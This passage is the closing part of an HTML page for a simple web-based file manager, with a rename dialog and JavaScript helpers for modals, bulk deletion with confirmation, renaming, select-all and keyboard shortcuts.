    <div class="modal" id="modalRename">
        <div class="modal-box">
            <h3>✏ rename</h3>
            <form method="post">
                <input type="hidden" name="old_name" id="renameOld">
                <input type="text" name="new_name" id="renameNew" placeholder="new name" required>
                <input type="hidden" name="rename" value="1">
                <div class="modal-actions">
                    <button type="submit" class="btn btn-success">rename</button>
                    <button type="button" class="btn" onclick="hideModal('modalRename')">cancel</button>
                </div>
            </form>
        </div>
    </div>
    
</div>

<script>
    function showModal(id) {
        document.getElementById(id).classList.add('show');
        document.body.style.overflow = 'hidden';
    }
    
    function hideModal(id) {
        document.getElementById(id).classList.remove('show');
        document.body.style.overflow = 'auto';
    }
    
    function deleteSelected() {
        const checked = document.querySelectorAll('input[name="items[]"]:checked');
        if (checked.length === 0) {
            alert('select items first');
            return;
        }
        if (!confirm('delete ' + checked.length + ' items?')) return;
        
        const values = [];
        checked.forEach(el => values.push(el.value));
        document.getElementById('deleteItems').value = values.join('|||');
        document.getElementById('deleteForm').submit();
    }
    
    function renameItem(name) {
        document.getElementById('renameOld').value = name;
        document.getElementById('renameNew').value = name;
        showModal('modalRename');
        document.getElementById('renameNew').focus();
        document.getElementById('renameNew').select();
    }
    
    document.getElementById('selectAll')?.addEventListener('change', function(e) {
        document.querySelectorAll('input[name="items[]"]').forEach(el => el.checked = e.target.checked);
    });
    
    document.addEventListener('keydown', function(e) {
        if (e.key === 'Escape') {
            document.querySelectorAll('.modal.show').forEach(el => hideModal(el.id));
        }
        if (e.ctrlKey && e.key === 'Enter') {
            document.querySelector('form[action*="save_edit"]')?.submit();
        }
    });
    
    document.querySelectorAll('.modal').forEach(modal => {
        modal.addEventListener('click', function(e) {
            if (e.target === this) hideModal(this.id);
        });
    });
</script>
</body>
</html>
